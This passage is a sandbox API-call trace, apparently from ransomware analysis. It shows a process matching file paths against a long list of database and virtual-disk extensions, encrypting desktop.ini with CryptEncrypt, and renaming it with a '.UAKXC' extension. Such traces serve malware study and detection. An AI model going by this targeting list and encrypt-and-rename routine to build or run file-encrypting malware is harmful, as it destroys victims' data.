lpSrch=".hdb") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".his") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".ib") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".idb") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".ihx") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".itdb") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".itw") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".jet") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".jtx") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".kdb") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".kexi") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".kexic") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".kexis") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".lgc") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".lwx") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".maf") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".maq") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".mar") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".mas") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".mav") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".mdb") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".mdf") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".mpd") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".mrg") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".mud") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".mwb") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".myd") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".ndf") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".nnt") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".nrmlib") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".ns2") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".ns3") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".ns4") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".nsf") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".nv") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".nv2") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".nwdb") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".nyf") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".odb") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".oqy") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".orx") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".owc") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".p96") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".p97") returned 0x0 [0147.671] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".pan") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".pdb") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".pdm") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".pnz") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".qry") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".qvd") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".rbf") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".rctd") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".rod") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".rodx") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".rpd") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".rsd") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".sas7bdat") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".sbf") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".scx") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".sdb") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".sdc") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".sdf") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".sis") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".spq") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".sql") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".sqlite") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".sqlite3") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".sqlitedb") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".te") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".temx") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".tmd") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".tps") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".trc") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".trm") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".udb") returned 0x0 [0147.672] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".udl") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".usr") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".v12") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".vis") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".vpd") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".vvv") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".wdb") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".wmdb") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".wrk") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".xdb") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".xld") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".xmlff") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".abcddb") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".abs") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".abx") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".accdw") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".adn") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".db2") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".fm5") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".hjt") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".icg") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".icr") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".kdb") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".lut") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".maw") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".mdn") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".mdt") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".vdi") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".vhd") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".vmdk") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".pvm") returned 0x0 [0147.673] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".vmem") returned 0x0 [0147.674] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".vmsn") returned 0x0 [0147.674] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".vmsd") returned 0x0 [0147.674] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".nvram") returned 0x0 [0147.674] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".vmx") returned 0x0 [0147.674] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".raw") returned 0x0 [0147.674] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".qcow2") returned 0x0 [0147.674] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".subvol") returned 0x0 [0147.674] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".bin") returned 0x0 [0147.674] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".vsv") returned 0x0 [0147.674] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".avhd") returned 0x0 [0147.674] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".vmrs") returned 0x0 [0147.674] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".vhdx") returned 0x0 [0147.674] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".avdx") returned 0x0 [0147.674] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".vmcx") returned 0x0 [0147.674] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".iso") returned 0x0 [0147.674] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.674] WriteFile (in: hFile=0x6f0, lpBuffer=0x373fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x373fc78, lpOverlapped=0x0 | out: lpBuffer=0x373fd70*, lpNumberOfBytesWritten=0x373fc78*=0x20c, lpOverlapped=0x0) returned 1 [0147.675] WriteFile (in: hFile=0x6f0, lpBuffer=0x373fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x373fc7c, lpOverlapped=0x0 | out: lpBuffer=0x373fc80*, lpNumberOfBytesWritten=0x373fc7c*=0xa, lpOverlapped=0x0) returned 1 [0147.675] SetEndOfFile (hFile=0x6f0) returned 1 [0147.675] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.675] ReadFile (in: hFile=0x6f0, lpBuffer=0x4100000, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x373fc88, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc88*=0xae, lpOverlapped=0x0) returned 1 [0147.675] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.675] WriteFile (in: hFile=0x6f0, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x373fc44, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc44*=0xae, lpOverlapped=0x0) returned 1 [0147.676] CloseHandle (hObject=0x6f0) returned 1 [0147.676] GetProcessHeap () returned 0xea0000 [0147.676] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xf29490 [0147.677] lstrcpyW (in: lpString1=0xf29490, lpString2="C:\\Users\\Public\\desktop.ini" | out: lpString1="C:\\Users\\Public\\desktop.ini") returned="C:\\Users\\Public\\desktop.ini" [0147.677] lstrcatW (in: lpString1="C:\\Users\\Public\\desktop.ini", lpString2=".UAKXC" | out: lpString1="C:\\Users\\Public\\desktop.ini.UAKXC") returned="C:\\Users\\Public\\desktop.ini.UAKXC" [0147.677] MoveFileW (lpExistingFileName="C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\desktop.ini.UAKXC" (normalized: "c:\\users\\public\\desktop.ini.uakxc")) returned 1 [0147.678] GetProcessHeap () returned 0xea0000 [0147.678] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf29490 | out: hHeap=0xea0000) returned 1 [0147.678] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1890 | out: hHeap=0xea0000) returned 1 [0147.678] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2ec0 | out: hHeap=0xea0000) returned 1 [0147.678] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0147.678] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0147.678] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0147.678] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab")) returned 0x2020 [0147.797] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec [0147.797] GetLastError () returned 0x0 [0147.797] GetFileSizeEx (in: hFile=0x6ec, lpFileSize=0x373fc88 | out: lpFileSize=0x373fc88*=16972987) returned 1 [0147.797] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".4dd") returned 0x0 [0147.798] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".4dl") returned 0x0 [0147.798] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".accdb") returned 0x0 [0147.798] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".accdc") returned 0x0 [0147.798] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".accde") returned 0x0 [0147.798] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".accdr") returned 0x0 [0147.798] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".accdt") returned 0x0 [0147.798] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".accft") returned 0x0 [0147.798] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".adb") returned 0x0 [0147.798] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".ade") returned 0x0 [0147.798] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".adf") returned 0x0 [0147.798] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".adp") returned 0x0 [0147.798] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".arc") returned 0x0 [0147.798] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".ora") returned 0x0 [0147.798] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".alf") returned 0x0 [0147.798] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".ask") returned 0x0 [0147.798] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".btr") returned 0x0 [0147.798] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".bdf") returned 0x0 [0147.798] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".cat") returned 0x0 [0147.799] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".cdb") returned 0x0 [0147.799] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".ckp") returned 0x0 [0147.799] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".cma") returned 0x0 [0147.799] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".cpd") returned 0x0 [0147.799] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".dacpac") returned 0x0 [0147.799] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".dad") returned 0x0 [0147.799] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".dadiagrams") returned 0x0 [0147.799] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".daschema") returned 0x0 [0147.799] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".db") returned 0x0 [0147.799] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".db-shm") returned 0x0 [0147.799] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".db-wal") returned 0x0 [0147.799] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".db3") returned 0x0 [0147.799] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".dbc") returned 0x0 [0147.799] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".dbf") returned 0x0 [0147.799] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".dbs") returned 0x0 [0147.799] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".dbt") returned 0x0 [0147.799] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".dbv") returned 0x0 [0147.799] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".dbx") returned 0x0 [0147.799] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".dcb") returned 0x0 [0147.800] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".dct") returned 0x0 [0147.800] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".dcx") returned 0x0 [0147.800] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".ddl") returned 0x0 [0147.800] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".dlis") returned 0x0 [0147.800] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".dp1") returned 0x0 [0147.800] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".dqy") returned 0x0 [0147.800] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".dsk") returned 0x0 [0147.800] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".dsn") returned 0x0 [0147.800] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".dtsx") returned 0x0 [0147.800] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".dxl") returned 0x0 [0147.800] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".eco") returned 0x0 [0147.800] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".ecx") returned 0x0 [0147.800] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".edb") returned 0x0 [0147.800] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".epim") returned 0x0 [0147.800] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".exb") returned 0x0 [0147.800] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".fcd") returned 0x0 [0147.800] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".fdb") returned 0x0 [0147.800] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".fic") returned 0x0 [0147.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".fmp") returned 0x0 [0147.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".fmp12") returned 0x0 [0147.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".fmpsl") returned 0x0 [0147.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".fol") returned 0x0 [0147.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".fp3") returned 0x0 [0147.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".fp4") returned 0x0 [0147.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".fp5") returned 0x0 [0147.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".fp7") returned 0x0 [0147.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".fpt") returned 0x0 [0147.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".frm") returned 0x0 